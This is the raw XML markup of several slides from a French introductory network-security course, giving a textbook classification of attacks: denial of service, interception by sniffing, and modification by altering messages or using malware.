          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Exemple, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>le message :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>« Autoriser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>lire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>fichiers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>confidentiels du compte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>» </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>est </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>modifié pour dire : </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>« </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Autoriser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Pirate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>lire les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>fichiers confidentiels du compte».</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1"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24</a:t>
            </a:fld>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176" y="4504997"/>
            <a:ext cx="6363588" cy="2353003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13289857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smtClean="0"/>
              <a:t>Les attaques actives</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289559" y="805752"/>
            <a:ext cx="11500822" cy="3675473"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Selon la nature de l’attaque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attaques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Actives</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Déni de service</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Empêche l’utilisation normale ou la gestion de fonctionnalités de communication. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Cette attaque peut avoir une cible spécifique ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>par exemple, une entité peut supprimer tous les messages dirigés vers une</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>destination particulière.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Une autre forme de refus de service est la perturbation d’un réseau dans</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>son intégralité : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> soit en mettant hors service le réseau, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>soit en le surchargeant de messages afin de dégrader ses performances. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1"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25</a:t>
            </a:fld>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127" y="4616156"/>
            <a:ext cx="6239746" cy="2105319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8762258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a:t>Classification des attaques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289558" y="805752"/>
            <a:ext cx="8916260" cy="5769219"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Selon l’objectif visé</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ce type d’attaque vise la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>confidentialité </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>des informations </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’attaquant intercepte les informations qui circulent sur le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>réseau, donc il obtient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>un accès non autorisé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Une lecture mais pas de modification des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>données, donc pas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>de changements dans le système</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Exemples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Écoute téléphonique dans le but de capturer des données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>copie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>non autorisée de fichiers ou de programmes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Techniques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>d’attaques :</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Sniffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" b="1"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26</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Groupe 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9551743" y="700780"/>
            <a:ext cx="2525332" cy="951253"/>
            <a:chOff x="6569057" y="1329197"/>
            <a:chExt cx="2525332" cy="951253"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Oval 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6732240" y="1700808"/>
              <a:ext cx="360040" cy="333817"/>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val 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8388424" y="1700808"/>
              <a:ext cx="360040" cy="333818"/>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Straight Connector 10"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="6" idx="6"/>
              <a:endCxn id="7" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7092280" y="1867717"/>
              <a:ext cx="1296144" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="00206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11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6569057" y="2003451"/>
              <a:ext cx="686406" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Source </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8042498" y="2001300"/>
              <a:ext cx="1051891" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Destination </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 15"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7171073" y="1329197"/>
              <a:ext cx="1194558" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" b="1" u="sng" dirty="0" smtClean="0"/>
                <a:t>Flux normal</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Groupe 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9715030" y="3061978"/>
            <a:ext cx="2016224" cy="1546307"/>
            <a:chOff x="9551743" y="3061978"/>
            <a:chExt cx="2016224" cy="1546307"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Oval 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9551743" y="3061978"/>
              <a:ext cx="360040" cy="333817"/>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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11207927" y="3061978"/>
              <a:ext cx="360040" cy="333818"/>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20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10667867" y="3992503"/>
              <a:ext cx="360040" cy="333817"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C0000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21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10485135" y="4331286"/>
              <a:ext cx="902811" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Attaquant </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Connector 22"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="13" idx="6"/>
              <a:endCxn id="14" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9911783" y="3228887"/>
              <a:ext cx="1296144" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="00206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Curved Connector 26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10144644" y="3228887"/>
              <a:ext cx="689128" cy="772773"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector2">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0792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a:t>Classification des attaques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289558" y="805752"/>
            <a:ext cx="8916260" cy="5769219"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Selon l’objectif visé</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modification </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cette attaque vise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’intégrité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> des données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’attaquant obtient un accès non autorisé à une ressource et la modifie </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Exemples</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Altérer un programme de tel façon à changer son comportement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Effacer certains fichiers sur un serveur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Modifier le contenu des messages transmis sur le réseau</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Techniques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Malware (virus, ver, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>torjan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>….)</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27</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Groupe 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9551743" y="700780"/>
            <a:ext cx="2525332" cy="951253"/>
            <a:chOff x="6569057" y="1329197"/>
            <a:chExt cx="2525332" cy="951253"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Oval 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6732240" y="1700808"/>
              <a:ext cx="360040" cy="333817"/>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val 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8388424" y="1700808"/>
              <a:ext cx="360040" cy="333818"/>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Straight Connector 10"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="6" idx="6"/>
              <a:endCxn id="7" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7092280" y="1867717"/>
              <a:ext cx="1296144" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="00206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11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6569057" y="2003451"/>
              <a:ext cx="686406" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Source </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8042498" y="2001300"/>
              <a:ext cx="1051891" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t>Destination </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 15"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7171073" y="1329197"/>
              <a:ext cx="1194558" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" b="1" u="sng" dirty="0" smtClean="0"/>
                <a:t>Flux normal</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Groupe 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9715030" y="3061978"/>
            <a:ext cx="2016224" cy="1546307"/>
            <a:chOff x="9551743" y="3061978"/>
            <a:chExt cx="2016224" cy="1546307"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Oval 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9551743" y="3061978"/>
              <a:ext cx="360040" cy="333817"/>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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11207927" y="3061978"/>
              <a:ext cx="360040" cy="333818"/>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20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10667867" y="3992503"/>
              <a:ext cx="360040" cy="333817"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C0000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21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10485135" y="4331286"/>
              <a:ext cx="902811" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
